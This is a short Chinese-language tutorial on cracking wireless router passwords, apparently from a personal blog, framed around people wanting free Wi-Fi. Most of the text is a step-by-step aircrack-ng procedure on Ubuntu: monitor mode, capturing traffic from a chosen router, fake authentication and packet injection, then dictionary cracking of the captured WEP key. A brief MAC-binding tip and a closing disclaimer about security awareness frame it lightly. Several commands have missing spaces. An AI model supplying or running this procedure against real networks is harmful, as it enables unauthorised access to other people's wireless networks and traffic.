教你如何破解无线路由器密码

　　最近很多人问我怎么破解无线密码?看来大家都对免费的东西比较感兴趣。要么也可能是我太招摇了…囧…好吧，我就写篇小小的教程。为了防止别人蹭网，大家可以在路由器里设置绑定MAC地址访问即可，那样破了密码也没用。

　　用的是ubuntu系统，没用linux系统的至少要在WIN里面安装ubuntu。1、安装aircrack-ng在终端中输入 sudo apt-getinstall aircrack-ng

　　2 、启动无线网卡的监控模式，在终端中输入：sudo airmon-ngstart wlan0

　　3 、看看有哪些无线路由在工作，在终端中输入：sudo airodump-ngmon0

　　然后按 ctrl+c 退出，保留终端。

　　4 、抓包，另开一个终端，输入：sudo airodump-ng -c 6--bssid 11:22:33:44:55:66 -w wep mon0

　　(-c 后面跟着的6是要破解的路由器的工作频道，--bissid后面跟着的11:22:33:44:55:66是欲破解无线路由的MAC地址，-w后面跟着的是抓下来的数据包的文件名，在步骤2可以查看正在工作的无线路由的频道和MAC地址，保存的文件名可随便命名)

　　5 、注入破解的话要与目标路由器建立虚拟连接，再另开一个终端，输入：

　　sudo aireplay-ng -1 0 -a 11:22:33:44:55:66 -haa:bb:cc:dd:ee:ff mon0

　　(-h后面跟着的aa:bb:cc:dd:ee:ff 是自己的无线网卡的MAC地址)，如果不知道可以在终端输入ifconfig 查看。

　　6 、成功建立虚拟连接后输入：

　　sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff mon0

　　进行注入，注入破解是为了加快抓包的速度。

　　7 、收集15000(用Bt4破解时的收集数据的个数)个以上的数据之后，另开一个

　　终端，输入：sudo aircrack-ng wep*.cap ，进行解密。注意这里命令的文件名要和步骤4一致。

　　Please specify a dictionary (option -w).这是提示找不到字典

　　再输入aircrack-ng –w 字典 wep-01.cap开始破解

　　8、破解出密码后在终端中输入 sudo airmon-ng stopmon0 关闭监控模式，不然无线网卡会一直向刚刚的无线路由进行注入

　　注意aircrack-ng里不带字典，需要将bt6里的字典或者自己生成的字典放到ubuntu的主文件夹中格式为xxx.txt

　　蹭网可耻啊，写这篇文章是有人想这样做,但是硬件破解的无线网卡木有,现在利用软件也可以了,让大家对无线网络安全性的重视。